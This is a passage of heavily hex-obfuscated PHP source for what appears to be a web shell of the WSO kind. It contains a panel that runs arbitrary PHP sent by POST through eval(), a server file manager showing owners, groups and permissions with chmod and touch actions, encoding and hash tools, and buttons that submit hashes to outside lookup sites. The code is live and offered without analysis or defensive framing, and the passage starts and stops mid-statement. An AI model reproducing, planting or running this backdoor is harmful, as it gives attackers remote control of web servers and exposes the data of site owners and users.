74\\x74t\\x75a\\x71\"]}=\"\";}while(${${\"\\x47LO\\x42\\x41L\\x53\"}[\"e\\x63\\x67gi\\x6dn\\x7a\\x75\"]}<\\x62r\\x3e\";}if(empty($_POST[\"a\\x6a\\x61\\x78\"])&&!empty($_POST[\"\\x701\"]))$_SESSION[md5($_SERVER[\"H\\x54\\x54P_HOS\\x54\"]).\"\\x61j\\x61\\x78\"]=false;echo\"\\x3c\\x68\\x31>\\x45\\x78\\x65\\x63\\x75\\x74\\x69on\\x20P\\x48\\x50-cod\\x65\\x3cdi\\x76\\x20\\x63\\x6c\\x61ss=content>\\x3c\\x74e\\x78ta\\x72e\\x61\\x20\\x6e\\x61m\\x65=\\x63\\x6f\\x64e\\x20clas\\x73=\\x62\\x69ga\\x72ea\\x20i\\x64=\\x50hp\\x43o\\x64\\x65\\x3e\".(!empty($_POST[\"\\x701\"])?htmlspecialchars($_POST[\"\\x701\"]):\"\").\"\\x3c/\\x74\\x65xt\\x61rea>\\x3c\\x69\\x6ep\\x75\\x74\\x20\\x74\\x79\\x70e\\x3d\\x73\\x75bmit \\x76\\x61\\x6cu\\x65\\x3dE\\x76\\x61\\x6c st\\x79l\\x65=\\\"\\x6da\\x72gi\\x6e-\\x74\\x6f\\x70:\\x35\\x70\\x78\\\">\";echo\" <\\x70r\\x65\\x20\\x69d=Php\\x4futp\\x75t\\x20st\\x79le=\\x22\".(empty($_POST[\"p1\"])?\"\\x64\\x69\\x73pla\\x79:none\\x3b\\n\":\"\").\"mar\\x67i\\x6e-t\\x6f\\x70:\\x35p\\x78\\x3b\\n\\x22 \\x63\\x6cas\\x73=ml1\\x3e\";if(!empty($_POST[\"\\x701\"])){ob_start();eval($_POST[\"p1\"]);echo htmlspecialchars(ob_get_clean());}echo\"${${\"\\x47L\\x4fB\\x41L\\x53\"}[\"sl\\x70\\x65\\x6cc\"]})$_SESSION[\"\\x66\"][${${\"\\x47L\\x4fBALS\"}[\"\\x6bs\\x76e\\x76j\\x6b\\x67t\\x76j\"]}]=urldecode(${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"s\\x6c\\x70\\x65\\x6c\\x63\"]});$_SESSION[\"\\x63w\\x64\"]=@$_POST[\"c\"];}break;}echo\"\\x3csc\\x72i\\x70\\x74\\x3edoc\\x75ment\\x2e\\x6df\\x2e\\x70\\x31\\x2ev\\x61l\\x75\\x65=\\x22\\x22;\\n\\x64o\\x63um\\x65nt\\x2em\\x66.p2\\x2ev\\x61l\\x75\\x65\\x3d\\\"\\x22;\\n\\n\\tfu\\x6e\\x63ti\\x6fn\\x20sa()\\x20{\\n\\t\\tfo\\x72(i\\x3d\\x30;\\n\\x69<\\x64\\x6fc\\x75m\\x65\\x6e\\x74\\x2ef\\x69\\x6ces\\x2e\\x65l\\x65men\\x74\\x73.len\\x67t\\x68;\\n\\x69++)\\n\\t\\t\\t\\x69f(\\x64o\\x63um\\x65n\\x74\\x2ef\\x69\\x6ces\\x2e\\x65\\x6c\\x65me\\x6ets[i].\\x74\\x79\\x70e\\x20\\x3d\\x3d 'ch\\x65c\\x6bbo\\x78\\x27)\\n\\t\\t\\t\\tdo\\x63\\x75\\x6d\\x65n\\x74\\x2efi\\x6c\\x65\\x73.\\x65\\x6cem\\x65\\x6et\\x73[\\x69]\\x2ech\\x65\\x63k\\x65d\\x20= docume\\x6et\\x2efi\\x6ce\\x73\\x2ee\\x6c\\x65\\x6den\\x74s[\\x30].\\x63\\x68e\\x63\\x6be\\x64;\\n\\t}\\n\\n\\x3c\\x66o\\x72m nam\\x65\\x3d\\x66i\\x6ces \\x6de\\x74\\x68\\x6f\\x64\\x3d\\x70\\x6fs\\x74>\\n\\n\";${\"\\x47\\x4c\\x4f\\x42\\x41LS\"}[\"\\x61\\x6dg\\x6el\\x73r\\x62\\x63\\x64\"]=\"\\x6c\\x69\\x6e\\x6bs\";$htjtdlybuf=\"n\";echo\"\\x3c\\x74h wi\\x64t\\x68\\x3d\\x27\\x31\\x33\\x70x'\\x3e\\x3c/\\x74\\x68>\\x3ct\\x68>\\x3c\\x61 hr\\x65f=\\x27\\x23\\x27\\x20\\x6fn\\x63\\x6cic\\x6b\\x3d'g(\\\"\\x46\\x69l\\x65\\x73\\x4d\\x61\\x6e\\\",\\x6e\\x75\\x6c\\x6c,\\x22\\x73\\x5f\\x6e\\x61me\\x5f\".(${${\"\\x47\\x4cOB\\x41LS\"}[\"c\\x6f\\x71onu\"]}[1]?0:1).\"\\x22)'\\x3eNa\\x6de\\x3c/a>\\x3c/\\x74\\x68>\\x3c\\x74h>\\x3ca\\x20\\x68\\x72\\x65\\x66='#'\\x20o\\x6e\\x63li\\x63k='g(\\x22F\\x69l\\x65s\\x4d\\x61\\x6e\\x22,\\x6eu\\x6cl,\\x22\\x73_s\\x69\\x7a\\x65_\".(${$jiychdnx}[1]?0:1).\"\\x22)'\\x3eS\\x69\\x7a\\x65\\x3c/a\\x3e\\x3c/\\x74\\x68>\\x3cth\\x3e\\x3c\\x61 \\x68\\x72e\\x66\\x3d\\x27#\\x27 \\x6fn\\x63l\\x69c\\x6b\\x3d'g(\\x22F\\x69\\x6ce\\x73\\x4d\\x61\\x6e\\\",n\\x75l\\x6c,\\\"s_\\x6d\\x6f\\x64\\x69fy_\".(${$cxlakobzy}[1]?0:1).\"\\\")'>M\\x6fd\\x69fy\\x3c/\\x61>\\x4f\\x77n\\x65\\x72/\\x47\\x72\\x6fup\\x3c/\\x74\\x68\\x3e\\x3cth\\x3e\\x3c\\x61\\x20hr\\x65f\\x3d'\\x23\\x27\\x20o\\x6e\\x63l\\x69c\\x6b\\x3d'g(\\x22\\x46ile\\x73M\\x61n\\\",n\\x75\\x6c\\x6c,\\\"s_perm\\x73_\".(${${\"\\x47LOBA\\x4cS\"}[\"\\x63kco\\x75\\x69\\x7a\\x78\"]}[1]?0:1).\"\\\")'\\x3e\\x50e\\x72\\x6d\\x69\\x73s\\x69ons<\\x74\\x68\\x3eAc\\x74ions\\x3c/t\\x72\\x3e\";${$quowyumn}=${$fifmgtmy}=${${\"\\x47\\x4c\\x4fBAL\\x53\"}[\"u\\x6c\\x75\\x6b\\x75\\x75\\x74\\x6a\\x65\\x6by\"]}=array();${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"j\\x65\\x79\\x65\\x6a\\x65jv\\x65\\x73\"]}=count(${$dkgdoor});for(${${\"GL\\x4fB\\x41L\\x53\"}[\"\\x70y\\x6e\\x6d\\x69\\x6f\\x72\\x69s\"]}=0;${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x6c\\x77\\x6c\\x68tf\\x6b\\x65\\x6a\"]}<${$htjtdlybuf};${${\"\\x47\\x4cOB\\x41\\x4c\\x53\"}[\"\\x75\\x62\\x6a\\x67\\x6diyvs\\x63\\x62\"]}++){${\"\\x47\\x4cOB\\x41\\x4c\\x53\"}[\"y\\x67\\x6a\\x78\\x73\\x6c\\x71\"]=\"i\";$nhkfjokyipxw=\"t\\x6d\\x70\";${\"G\\x4c\\x4fBA\\x4cS\"}[\"x\\x6d\\x7a\\x71\\x66o\"]=\"t\\x6dp\";$hxhtkxcopfku=\"i\";${\"G\\x4cOB\\x41\\x4c\\x53\"}[\"\\x62\\x6eh\\x69\\x72\\x6f\\x6a\\x68\\x67\\x78g\\x77\"]=\"\\x67\\x72\";${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x77\\x69\\x65\\x74\\x63\\x72\\x6f\"]=\"\\x64i\\x72\\x43\\x6f\\x6eten\\x74\";$gkiykg=\"d\\x69\\x72\\x43\\x6f\\x6e\\x74\\x65\\x6e\\x74\";$oolvws=\"\\x69\";${\"\\x47\\x4c\\x4f\\x42AL\\x53\"}[\"\\x6c\\x65\\x66\\x66q\\x7a\\x78\\x76\\x76\"]=\"\\x64\\x69rC\\x6fn\\x74\\x65n\\x74\";${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x66\\x6b\\x76q\\x6bb\\x6d\"]=\"\\x64\\x69\\x72\\x43\\x6f\\x6e\\x74\\x65n\\x74\";$oqwfempygnqr=\"\\x64\\x69\\x72\\x43\\x6fn\\x74\\x65\\x6et\";$iesoyaib=\"\\x69\";${\"GL\\x4f\\x42\\x41\\x4c\\x53\"}[\"k\\x68\\x63zds\\x78\\x66j\\x68\\x63\"]=\"\\x69\";${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"yb\\x76\\x6an\\x71\\x6a\"]=\"\\x64\\x69\\x72C\\x6f\\x6e\\x74\\x65n\\x74\";${\"\\x47LO\\x42\\x41\\x4cS\"}[\"\\x77\\x77\\x70\\x68vt\\x73\\x69\\x78\\x65\"]=\"\\x69\";$jlzemlbq=\"i\";${\"GL\\x4f\\x42A\\x4c\\x53\"}[\"\\x79\\x67\\x79\\x72\\x71si\\x6f\\x68\\x6eb\"]=\"d\\x69r\\x43\\x6f\\x6e\\x74en\\x74\";$xswwcoa=\"\\x6f\\x77\";${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"\\x6ep\\x65c\\x76wo\\x65m\\x62\"]}=@posix_getpwuid(@fileowner(${${\"\\x47\\x4c\\x4f\\x42ALS\"}[\"\\x79\\x67\\x79\\x72\\x71\\x73\\x69\\x6f\\x68n\\x62\"]}[${${\"\\x47\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x79\\x67\\x6a\\x78s\\x6c\\x71\"]}]));${\"\\x47\\x4cO\\x42AL\\x53\"}[\"\\x70\\x7a\\x6c\\x73u\\x6b\\x79\\x66\"]=\"i\";${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"y\\x6e\\x70hts\\x73u\"]=\"\\x69\";${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"\\x62\\x6e\\x68i\\x72\\x6fj\\x68g\\x78\\x67\\x77\"]}=@posix_getgrgid(@filegroup(${${\"G\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x6c\\x62ski\\x69\"]}[${$oolvws}]));$dxuhdgle=\"\\x69\";${\"GLOBA\\x4c\\x53\"}[\"\\x71x\\x74\\x6cw\\x6fowxr\\x74\"]=\"\\x66\\x69l\\x65\\x73\";${${\"\\x47LO\\x42\\x41L\\x53\"}[\"\\x78m\\x7a\\x71fo\"]}=array(\"n\\x61me\"=>${$gkiykg}[${$hxhtkxcopfku}],\"p\\x61th\"=>$GLOBALS[\"cw\\x64\"].${${\"\\x47\\x4cOB\\x41\\x4cS\"}[\"l\\x62s\\x6b\\x69i\"]}[${$dxuhdgle}],\"\\x6d\\x6f\\x64i\\x66y\"=>date(\"Y-\\x6d-\\x64 H:i:\\x73\",@filemtime($GLOBALS[\"c\\x77\\x64\"].${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x66\\x6b\\x76\\x71\\x6bbm\"]}[${${\"\\x47\\x4cOB\\x41\\x4c\\x53\"}[\"\\x79\\x6e\\x70\\x68\\x74s\\x73\\x75\"]}])),\"\\x70\\x65rms\"=>viewPermsColor($GLOBALS[\"c\\x77\\x64\"].${${\"GL\\x4fB\\x41\\x4c\\x53\"}[\"l\\x62\\x73\\x6b\\x69\\x69\"]}[${$iesoyaib}]),\"\\x73\\x69\\x7ae\"=>@filesize($GLOBALS[\"cwd\"].${$oqwfempygnqr}[${${\"G\\x4cO\\x42\\x41\\x4cS\"}[\"ubjgm\\x69y\\x76s\\x63b\"]}]),\"\\x6fwn\\x65r\"=>${$xswwcoa}[\"n\\x61m\\x65\"]?${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x6e\\x70\\x65\\x63\\x76\\x77\\x6fe\\x6db\"]}[\"nam\\x65\"]:@fileowner(${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"l\\x62\\x73\\x6b\\x69i\"]}[${${\"\\x47\\x4cO\\x42\\x41L\\x53\"}[\"k\\x68\\x63z\\x64\\x73\\x78\\x66j\\x68\\x63\"]}]),\"\\x67r\\x6fu\\x70\"=>${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x62j\\x65et\\x6f\\x72\\x67\\x75\\x67\\x6d\\x6d\"]}[\"n\\x61\\x6d\\x65\"]?${${\"G\\x4cO\\x42A\\x4cS\"}[\"\\x62jee\\x74o\\x72\\x67ugm\\x6d\"]}[\"\\x6ea\\x6de\"]:@filegroup(${${\"\\x47LOBA\\x4c\\x53\"}[\"\\x77\\x69e\\x74\\x63\\x72\\x6f\"]}[${${\"G\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x77\\x77\\x70\\x68\\x76\\x74s\\x69x\\x65\"]}]));if(@is_file($GLOBALS[\"\\x63\\x77\\x64\"].${${\"G\\x4c\\x4f\\x42ALS\"}[\"le\\x66\\x66\\x71\\x7ax\\x76v\"]}[${${\"GL\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x75\\x62\\x6a\\x67mi\\x79\\x76\\x73\\x63\\x62\"]}]))${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x71\\x78\\x74\\x6c\\x77\\x6f\\x6f\\x77\\x78\\x72\\x74\"]}[]=array_merge(${${\"\\x47LOB\\x41\\x4c\\x53\"}[\"\\x62\\x6e\\x66\\x69\\x74\\x6a\"]},array(\"t\\x79pe\"=>\"f\\x69le\"));elseif(@is_link($GLOBALS[\"\\x63wd\"].${${\"G\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"lb\\x73k\\x69i\"]}[${$jlzemlbq}]))${${\"\\x47\\x4cO\\x42\\x41LS\"}[\"e\\x73k\\x76\\x75\\x6a\\x78\\x78\"]}[]=array_merge(${$nhkfjokyipxw},array(\"t\\x79\\x70\\x65\"=>\"l\\x69\\x6ek\"));elseif(@is_dir($GLOBALS[\"c\\x77\\x64\"].${${\"\\x47L\\x4fB\\x41L\\x53\"}[\"\\x79\\x62\\x76\\x6a\\x6e\\x71j\"]}[${${\"\\x47LOB\\x41L\\x53\"}[\"\\x70\\x7a\\x6csu\\x6b\\x79f\"]}])&&(${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"l\\x62sk\\x69\\x69\"]}[${${\"\\x47L\\x4fB\\x41L\\x53\"}[\"\\x75b\\x6ag\\x6d\\x69\\x79\\x76\\x73\\x63\\x62\"]}]!=\".\"))${${\"\\x47L\\x4fB\\x41LS\"}[\"v\\x69\\x78z\\x67\\x67\\x6f\\x6e\\x65\\x70\"]}[]=array_merge(${${\"GL\\x4f\\x42\\x41\\x4c\\x53\"}[\"bnf\\x69\\x74\\x6a\"]},array(\"\\x74\\x79p\\x65\"=>\"\\x64\\x69r\"));}$GLOBALS[\"sor\\x74\"]=${${\"G\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x63\\x6f\\x71\\x6f\\x6e\\x75\"]};function cmp($a,$b){$xmghox=\"b\";${\"\\x47\\x4c\\x4f\\x42A\\x4cS\"}[\"pvivs\\x67\\x72\\x6c\\x63\"]=\"a\";if($GLOBALS[\"sor\\x74\"][0]!=\"\\x73\\x69\\x7a\\x65\")return strcmp(${${\"\\x47\\x4c\\x4fB\\x41LS\"}[\"w\\x6c\\x72\\x79\\x78\\x61\\x72f\\x6d\"]}[$GLOBALS[\"s\\x6f\\x72\\x74\"][0]],${${\"\\x47\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x71k\\x64\\x76\\x75y\\x77x\\x74\\x7a\"]}[$GLOBALS[\"\\x73\\x6f\\x72t\"][0]])*($GLOBALS[\"so\\x72t\"][1]?1:-1);else return((${${\"\\x47\\x4cO\\x42A\\x4cS\"}[\"pvi\\x76\\x73\\x67\\x72lc\"]}[\"si\\x7ae\"]<${$xmghox}[\"s\\x69\\x7a\\x65\"])?-1:1)*($GLOBALS[\"s\\x6frt\"][1]?1:-1);}usort(${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x75\\x6d\\x77\\x67\\x76\\x64ge\"]},\"cm\\x70\");usort(${${\"\\x47\\x4c\\x4fB\\x41LS\"}[\"v\\x69\\x78zgg\\x6f\\x6e\\x65p\"]},\"\\x63\\x6dp\");$xunylnt=\"l\\x69\\x6e\\x6bs\";usort(${${\"\\x47L\\x4fBAL\\x53\"}[\"\\x61\\x6d\\x67\\x6e\\x6cs\\x72\\x62\\x63\\x64\"]},\"\\x63\\x6dp\");${${\"GLOB\\x41LS\"}[\"h\\x64o\\x72\\x6a\\x70\\x75\"]}=array_merge(${${\"\\x47\\x4cOB\\x41\\x4c\\x53\"}[\"a\\x63f\\x71\\x71\\x66ys\\x62fz\\x70\"]},${$xunylnt},${${\"\\x47LO\\x42A\\x4cS\"}[\"umw\\x67\\x76\\x64ge\"]});${${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"\\x6f\\x7a\\x6c\\x77o\\x66\\x66\"]}=0;foreach(${${\"G\\x4cOB\\x41LS\"}[\"\\x75mw\\x67v\\x64\\x67\\x65\"]} as${${\"\\x47\\x4c\\x4f\\x42A\\x4cS\"}[\"s\\x6c\\x70\\x65\\x6c\\x63\"]}){$rvrgjfhpjdk=\"f\";$izzwfzokizj=\"\\x66\";$mwgzdwxpkn=\"\\x66\";${\"G\\x4c\\x4fB\\x41\\x4cS\"}[\"tb\\x6a\\x78dd\\x6f\\x77t\"]=\"\\x66\";$afxohmbei=\"\\x66\";${\"\\x47\\x4c\\x4fBAL\\x53\"}[\"\\x64sq\\x76\\x62\\x64e\\x6a\\x73u\"]=\"\\x66\";$ezrujob=\"\\x66\";$cmmbnxgheit=\"\\x6c\";$jdikjgstic=\"\\x66\";$rwfqnwioaf=\"\\x66\";$nvbeellcwieh=\"f\";echo\"\\x3c\\x74\\x72\".(${$cmmbnxgheit}?\"\\x20\\x63\\x6ca\\x73\\x73=\\x6c1\":\"\").\"><\\x69\\x6e\\x70\\x75t t\\x79\\x70\\x65=\\x63\\x68e\\x63k\\x62\\x6fx\\x20\\x6e\\x61\\x6d\\x65\\x3d\\\"f[]\\\" \\x76\\x61\\x6cue\\x3d\\x22\".urlencode(${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x73l\\x70e\\x6cc\"]}[\"nam\\x65\"]).\"\\\"\\x20\\x63\\x6c\\x61s\\x73\\x3d\\x63\\x68\\x6b\\x62\\x78>\\x3c\\x62\\x3e[\\x20\".htmlspecialchars(${${\"\\x47\\x4cOB\\x41L\\x53\"}[\"t\\x62j\\x78\\x64\\x64o\\x77\\x74\"]}[\"nam\\x65\"]).\"\\x20]\\x3c/td\\x3e\\x3ct\\x64>\".((${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x73\\x6cp\\x65l\\x63\"]}[\"t\\x79pe\"]==\"f\\x69\\x6c\\x65\")?viewSize(${$rvrgjfhpjdk}[\"\\x73\\x69\\x7ae\"]):${$afxohmbei}[\"t\\x79p\\x65\"]).\"\\x3c/\\x74\\x64>\".${${\"GL\\x4f\\x42\\x41\\x4cS\"}[\"\\x73\\x6c\\x70\\x65\\x6c\\x63\"]}[\"modi\\x66\\x79\"].\"\\x3c/\\x74d><\\x74\\x64>\".${${\"\\x47LOB\\x41\\x4c\\x53\"}[\"\\x73\\x6c\\x70el\\x63\"]}[\"\\x6fw\\x6ee\\x72\"].\"/\".${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"sl\\x70\\x65l\\x63\"]}[\"\\x67ro\\x75\\x70\"].\"\\x3c/td\\x3e\\x3c\\x74d><\\x61\\x20\\x68r\\x65\\x66\\x3d\\x23 o\\x6e\\x63l\\x69ck=\\\"g('\\x46\\x69l\\x65s\\x54ool\\x73',n\\x75l\\x6c,\\x27\".urlencode(${${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"d\\x73\\x71\\x76b\\x64\\x65\\x6a\\x73\\x75\"]}[\"\\x6e\\x61me\"]).\"\\x27,\\x27\\x63\\x68\\x6d\\x6fd')\\\">\".${$jdikjgstic}[\"per\\x6d\\x73\"].\"\\x3c/t\\x64><\\x74\\x64>\\x52\\x3c/a\\x3e\\x20\\x3c\\x61\\x20hr\\x65f=\\\"\\x23\\x22 \\x6f\\x6ec\\x6ci\\x63k=\\x22\\x67(\\x27\\x46\\x69\\x6ces\\x54ools',\\x6e\\x75\\x6c\\x6c,'\".urlencode(${${\"\\x47\\x4c\\x4f\\x42\\x41LS\"}[\"sl\\x70\\x65\\x6cc\"]}[\"n\\x61\\x6de\"]).\"\\x27,\\x20'\\x74\\x6f\\x75\\x63h')\\x22>\\x54\":\"\").\"\\x3c/t\\x64>\\x3c/tr>\";${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6f\\x7al\\x77\\x6f\\x66\\x66\"]}=${${\"G\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"o\\x7alw\\x6f\\x66\\x66\"]}?0:1;}echo \"\\t\\n\\t<\\x69\\x6ep\\x75t ty\\x70e\\x3d\\x68\\x69\\x64de\\x6e \\x6e\\x61m\\x65=\\x63\\x20\\x76\\x61\\x6cue=\\x27\\n\";echo htmlspecialchars($GLOBALS[\"cw\\x64\"]);echo \"'>\\n\\t\\x3ci\\x6eput t\\x79pe=h\\x69d\\x64e\\x6e\\x20name=\\x63harset \\x76al\\x75\\x65='\\n\";echo isset($_POST[\"c\\x68\\x61\\x72\\x73\\x65t\"])?$_POST[\"\\x63h\\x61r\\x73et\"]:\"\";echo \"\\x27\\x3e\\n\\t<\\x73el\\x65\\x63\\x74\\x20\\x6ea\\x6de=\\x27p1'\\x3e\\x3c\\x6fpti\\x6fn va\\x6c\\x75\\x65\\x3d'cop\\x79\\x27\\x3e\\x43\\x6f\\x70y\\x3c\\x6fption\\x20v\\x61\\x6cu\\x65=\\x27m\\x6fv\\x65\\x27\\x3e\\x4do\\x76\\x65\\n\";}echo \"\\x22\\x3e\\x3c/td>\\n\\t\\x3c/f\\x6f\\x72\\x6d\\x3e\\n\\t\\n\";printFooter();}function actionStringTools(){${\"\\x47\\x4cOBA\\x4c\\x53\"}[\"f\\x63\\x64o\\x71\\x71\\x64\\x67\\x70fd\"]=\"st\\x72i\\x6egT\\x6f\\x6fls\";if(!function_exists(\"\\x68\\x65x\\x32\\x62\\x69n\")){function hex2bin($p){$uskpyv=\"\\x70\";return decbin(hexdec(${$uskpyv}));}}if(!function_exists(\"\\x68e\\x782a\\x73ci\\x69\")){function hex2ascii($p){$hmfnaw=\"\\x69\";${\"G\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x69\\x79\\x65\\x79\\x72\\x6anj\\x67q\\x64\"]=\"\\x69\";$tsdmjxh=\"\\x70\";${${\"G\\x4cOB\\x41\\x4cS\"}[\"\\x72a\\x65\\x61\\x71c\"]}=\"\";for(${$hmfnaw}=0;${${\"GLO\\x42\\x41L\\x53\"}[\"\\x75\\x62\\x6a\\x67m\\x69y\\x76s\\x63b\"]}<\\x64\\x69v\\x20\\x63l\\x61ss=\\x63o\\x6ete\\x6et\\x3e\";${$mlndonin}=array(\"Ba\\x73\\x65\\x364 enc\\x6fde\"=>\"ba\\x73\\x65\\x364_enc\\x6fd\\x65\",\"\\x42as\\x656\\x34\\x20\\x64e\\x63od\\x65\"=>\"\\x62\\x61\\x73\\x6564\\x5f\\x64e\\x63\\x6f\\x64\\x65\",\"U\\x72\\x6c \\x65nc\\x6f\\x64e\"=>\"\\x75\\x72l\\x65\\x6e\\x63ode\",\"\\x55rl\\x20dec\\x6fde\"=>\"u\\x72l\\x64eco\\x64\\x65\",\"\\x46\\x75\\x6cl ur\\x6ce\\x6e\\x63\\x6fd\\x65\"=>\"\\x66ul\\x6c_\\x75\\x72\\x6c\\x65n\\x63ode\",\"md5 ha\\x73\\x68\"=>\"\\x6dd5\",\"\\x73h\\x611\\x20hash\"=>\"\\x73ha1\",\"c\\x72\\x79\\x70\\x74\"=>\"\\x63\\x72\\x79\\x70t\",\"\\x43RC32\"=>\"c\\x72c32\",\"\\x41\\x53C\\x49I t\\x6f \\x48\\x45\\x58\"=>\"\\x61\\x73cii\\x32h\\x65x\",\"H\\x45\\x58\\x20\\x74\\x6f\\x20A\\x53C\\x49\\x49\"=>\"\\x68\\x65\\x782\\x61\\x73ci\\x69\",\"HE\\x58\\x20to\\x20D\\x45\\x43\"=>\"hexd\\x65c\",\"H\\x45\\x58 to \\x42\\x49\\x4e\"=>\"h\\x65x\\x32bi\\x6e\",\"D\\x45\\x43 t\\x6f H\\x45\\x58\"=>\"d\\x65\\x63\\x68ex\",\"\\x44\\x45C \\x74\\x6f \\x42\\x49N\"=>\"\\x64\\x65c\\x62\\x69n\",\"\\x42\\x49\\x4e to H\\x45X\"=>\"b\\x69n2he\\x78\",\"BIN \\x74\\x6f\\x20DEC\"=>\"b\\x69\\x6e\\x64\\x65\\x63\",\"\\x53\\x74ri\\x6e\\x67\\x20\\x74o \\x6c\\x6fw\\x65\\x72\\x20\\x63\\x61s\\x65\"=>\"\\x73trt\\x6flower\",\"S\\x74ri\\x6eg to\\x20\\x75\\x70p\\x65r\\x20\\x63\\x61\\x73e\"=>\"\\x73\\x74rto\\x75pp\\x65\\x72\",\"Htm\\x6c\\x73pec\\x69\\x61\\x6c\\x63h\\x61\\x72s\"=>\"\\x68t\\x6dlsp\\x65ci\\x61l\\x63ha\\x72s\",\"S\\x74ring\\x20le\\x6e\\x67\\x74\\x68\"=>\"\\x73trl\\x65\\x6e\",);if(empty($_POST[\"a\\x6a\\x61x\"])&&!empty($_POST[\"p\\x31\"]))$_SESSION[md5($_SERVER[\"HTT\\x50\\x5f\\x48O\\x53T\"]).\"\\x61j\\x61x\"]=false;echo\"\\x3cfo\\x72\\x6d \\x6e\\x61m\\x65\\x3d\\x27\\x74o\\x6f\\x6cs\\x46\\x6f\\x72m' \\x6f\\x6eSub\\x6d\\x69\\x74\\x3d\\x27if(\\x74\\x68\\x69s.aja\\x78.\\x63he\\x63\\x6b\\x65d){a(\\x6e\\x75\\x6c\\x6c,null,\\x74h\\x69s\\x2ese\\x6cec\\x74\\x54oo\\x6c\\x2ev\\x61\\x6cue,th\\x69s\\x2ein\\x70u\\x74\\x2e\\x76a\\x6c\\x75e)\\x3b\\n}e\\x6cse{g(nul\\x6c,n\\x75\\x6c\\x6c,th\\x69\\x73\\x2esel\\x65ct\\x54o\\x6fl.\\x76\\x61l\\x75e,th\\x69s\\x2einp\\x75t.\\x76alu\\x65);\\n}\\x20\\x72\\x65\\x74u\\x72\\x6e fal\\x73\\x65;\\n\\x27\\x3e\\x3cs\\x65lec\\x74\\x20nam\\x65='se\\x6c\\x65\\x63tT\\x6f\\x6fl\\x27\\x3e\";foreach(${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x66\\x63d\\x6f\\x71\\x71d\\x67p\\x66d\"]} as${$qbezujgttujl}=>${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"e\\x75\\x64\\x6f\\x75e\"]})echo\"\".${${\"\\x47\\x4c\\x4f\\x42A\\x4cS\"}[\"i\\x69\\x66\\x77\\x76\\x71c\\x6a\\x6f\\x78\"]}.\"\\x3cinpu\\x74 ty\\x70e=\\x27s\\x75\\x62\\x6di\\x74\\x27 v\\x61\\x6cu\\x65\\x3d'\\x3e>\\x27/\\x3e \\x3ci\\x6e\\x70ut t\\x79\\x70\\x65\\x3d\\x63h\\x65ckb\\x6fx \\x6eam\\x65\\x3d\\x61j\\x61\\x78 \\x76\\x61\\x6cue\\x3d1\\x20\".($_SESSION[md5($_SERVER[\"H\\x54TP_\\x48\\x4fS\\x54\"]).\"\\x61\\x6aax\"]?\"c\\x68e\\x63\\x6be\\x64\":\"\").\"\\x3e\\x20s\\x65\\x6ed\\x20using AJ\\x41X\".htmlspecialchars(@$_POST[\"\\x702\"]).\"\\x3c/t\\x65x\\x74area\\x3e\\x3c/\\x66o\\x72\\x6d>
S\\x65a\\x72c\\x68\\x20f\\x6fr ha\\x73h:\\n\\t\\t\\t<\\x69n\\x70\\x75t\\x20type\\x3d\\\"t\\x65x\\x74\\x22 \\x6ea\\x6de\\x3d\\\"\\x68\\x61s\\x68\\x22\\x20styl\\x65\\x3d\\\"\\x77\\x69dth:2\\x300\\x70x;\\n\\x22\\x3e<\\x62\\x72\\x3e\\n\\t\\t\\t<\\x62r>\\n\\t\\t\\t<\\x62r\\x3e\\n\\t\\t\\t\\x3c\\x69n\\x70\\x75\\x74\\x20t\\x79\\x70e\\x3d\\x22\\x62u\\x74\\x74\\x6f\\x6e\\\"\\x20val\\x75\\x65=\\x22too\\x6c\\x734n\\x6f\\x6fb\\x73.\\x63\\x6fm\\\"\\x20onc\\x6cic\\x6b=\\\"\\x64o\\x63u\\x6d\\x65nt.h\\x66\\x2eact\\x69on\\x3d'http://\\x77w\\x77.\\x74\\x6f\\x6f\\x6cs4n\\x6fobs.com/onl\\x69\\x6ee\\x5fp\\x68p_\\x66\\x75\\x6e\\x63t\\x69o\\x6es/'\\x3b\\n\\x64\\x6fcu\\x6den\\x74\\x2eh\\x66\\x2esubmi\\x74()\\x22\\x3e\\x3c\\x62\\x72>\\n\\t\\t\\t\\x3c\\x69np\\x75\\x74\\x20ty\\x70\\x65\\x3d\\x22bu\\x74\\x74\\x6f\\x6e\\\" v\\x61lu\\x65=\\\"\\x6dd5.red\\x6eoi\\x7ae\\x2ec\\x6fm\\x22 